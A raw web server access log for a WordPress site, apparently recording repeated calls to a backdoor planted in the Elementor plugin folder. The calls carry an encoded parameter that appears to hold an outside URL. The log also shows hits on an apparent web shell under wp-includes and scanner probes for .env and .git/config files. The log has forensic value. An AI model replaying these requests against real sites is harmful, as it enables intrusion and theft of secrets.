179.188.53.243 - - [16/Mar/2026:01:09:35 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373737352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343137352q3637646639653332313066353263623366636636353237306430363733633865222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:09:56 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373739362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343139362q6533316233356431333430303636643162393230643632356465346532323738222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:13:30 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:10:18 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373831382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343231382q6139353930303632323366636261643037323534643364383335373436626330222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:10:39 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373833392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343233392q3266373538316465383234646134356663323530376238353366653865613631222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:11:00 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373836302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343236302q6631643561316464323133313739316235633665363231623030353666373363222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:11:22 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373838322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343238322q3661613030363030626662356339666332353966343332333234613264636635222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:15:02 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:11:44 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373930342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343330342q6232343333656331656232666361663531323335613864396231326133626239222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:12:05 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373932352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343332352q6466326433353364383633656536396132363336623266323964303839316162222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:12:28 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373934382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343334382q3966386334343934323531663637376365646366333836666539376232393563222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:12:50 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373937302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343337302q6464333533373533643031383866623861653337303366636663653266616131222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:16:36 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:13:11 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633373939312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343339312q6362313861636561613238306331653534383239316238643331326266333331222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:13:33 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383031332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343431332q3232376239653662306362643332343961636262313830343965653837653663222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:13:54 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383033342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343433342q6161323733356139663134643431643664313639313534653063353462396165222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:14:15 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383035352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343435352q3161383935653539343561313038663033616664336532323933363432636332222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [16/Mar/2026:01:19:35 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:01:14:36 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383037362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343437362q3538356366363162616235616434373065653737323231386562333561396664222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:01:18:09 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:01:14:57 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383039372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343439372q3933396164303762623032313264386139306633636635303434316337343065222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:15:18 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383131382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343531382q3035366136383735393465353161626538396365623039346265313965313731222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:01:15:40 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383134302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343534302q3938653536613161333662623165626236613163306165656138623037336230222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
159.223.132.86 - - [16/Mar/2026:01:20:18 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:19 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:20:50 -0300] "GET /about HTTP/1.1" 404 196 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
179.188.53.243 - - [16/Mar/2026:01:16:01 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383136312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343536312q3766346334663530376331336236346532396135373063353064613932653234222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
159.223.132.86 - - [16/Mar/2026:01:20:41 -0300] "GET /console/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:42 -0300] "GET /console/ HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:20:44 -0300] "GET /server HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:45 -0300] "GET /server HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:20:47 -0300] "GET /server-status HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:48 -0300] "GET /server-status HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:51 -0300] "GET /about HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:20:51 -0300] "GET /login.action HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:20:54 -0300] "GET /v2/_catalog HTTP/1.1" 200 8117 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:54 -0300] "GET /login.action HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:20:57 -0300] "GET /.DS_Store HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:20:57 -0300] "GET /v2/_catalog HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:00 -0300] "GET /.env HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:00 -0300] "GET /.DS_Store HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:03 -0300] "GET /.env HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:07 -0300] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:08 -0300] "GET /.git/config HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:04 -0300] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
69.197.179.242 - - [16/Mar/2026:01:19:42 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
209.38.248.17 - - [16/Mar/2026:01:21:11 -0300] "GET /.git/config HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:11 -0300] "POST /graphql HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:13 -0300] "POST /graphql HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:13 -0300] "POST /api HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:14 -0300] "POST /api HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:14 -0300] "POST /api/graphql HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:16 -0300] "POST /api/graphql HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:16 -0300] "POST /graphql/api HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:17 -0300] "POST /graphql/api HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:17 -0300] "POST /api/gql HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
209.38.248.17 - - [16/Mar/2026:01:21:18 -0300] "POST /api/gql HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
159.223.132.86 - - [16/Mar/2026:01:21:19 -0300] "GET /s/334323e23353e2838313e2937313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (l9scan/2.0.334323e23353e2838313e2937313; +https://leakix.net)"
179.188.53.243 - - [16/Mar/2026:01:16:22 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333633383138322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633343538322q3136393432396433653835306564313665636232356537383430636166376166222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
